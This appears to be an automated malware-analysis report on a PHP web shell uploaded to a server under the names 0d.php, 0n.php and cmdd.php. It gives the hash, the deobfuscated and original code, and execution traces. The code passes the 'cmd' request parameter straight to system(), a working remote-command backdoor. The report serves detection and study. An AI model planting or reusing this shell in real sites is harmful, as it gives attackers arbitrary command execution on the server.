PHP Malware Analysis

0d.php, 0n.php, cmdd.php

md5: 756215a64e7d43153298f1a5a5fde295

Attributes

Execution


Deobfuscated PHP code

<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}

Execution traces

data/traces/756215a64e7d43153298f1a5a5fde295_trace-1676244341.4682.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:26:07.366063]
1	0	1	0.000147	393464
1	3	0	0.000200	394544	{main}	1		/var/www/html/uploads/0d.php	0	0
1	3	1	0.000217	394544
			0.000241	314200
TRACE END   [2023-02-12 21:26:07.366188]

data/traces/756215a64e7d43153298f1a5a5fde295_trace-1676250094.018.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:01:59.915798]
1	0	1	0.000154	393464
1	3	0	0.000209	394544	{main}	1		/var/www/html/uploads/0n.php	0	0
1	3	1	0.000227	394544
			0.000252	314200
TRACE END   [2023-02-12 23:01:59.915923]

data/traces/756215a64e7d43153298f1a5a5fde295_trace-1676257193.263.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:00:19.160808]
1	0	1	0.000145	393512
1	3	0	0.000197	394592	{main}	1		/var/www/html/uploads/cmdd.php	0	0
1	3	1	0.000215	394592
			0.000239	314224
TRACE END   [2023-02-13 01:00:19.160931]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>